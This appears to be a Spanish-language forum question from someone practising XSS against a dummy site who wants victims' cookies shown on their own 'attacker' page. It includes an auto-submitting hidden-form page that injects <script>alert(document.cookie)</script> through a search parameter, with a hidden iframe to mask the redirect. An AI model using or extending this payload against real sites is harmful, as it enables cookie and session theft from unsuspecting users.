Intentando practicar XSS en un sitio web ficticio. Mi objetivo final es mostrar las cookies de la víctima en mi sitio de "atacante". Actualmente, lo que tengo es que cuando el usuario ingrese a mi sitio, abrirá el sitio web ficticio y alertará a las víctimas a través de javascript. ¿Hay alguna forma de hacer que aparezca la alerta en mi sitio de atacante?
<!DOCTYPE html>
<head></head>
<body>
<form name ='xss_form' action='http://dummy_site.com/search' method="GET">
<input type='hidden' name='query' value='<script>alert(document.cookie)</script>'>
</form>
<iframe name="hiddenFrame" style='display:none'></iframe>
<script>
document.xss_form.submit();
</script>
</body>
El iframe se configura de manera que si hay una forma de mostrar el cuadro de alerta en mi sitio del atacante, puedo establecer el destino del formulario en el iframe y evitar la ventana emergente de dummy_site.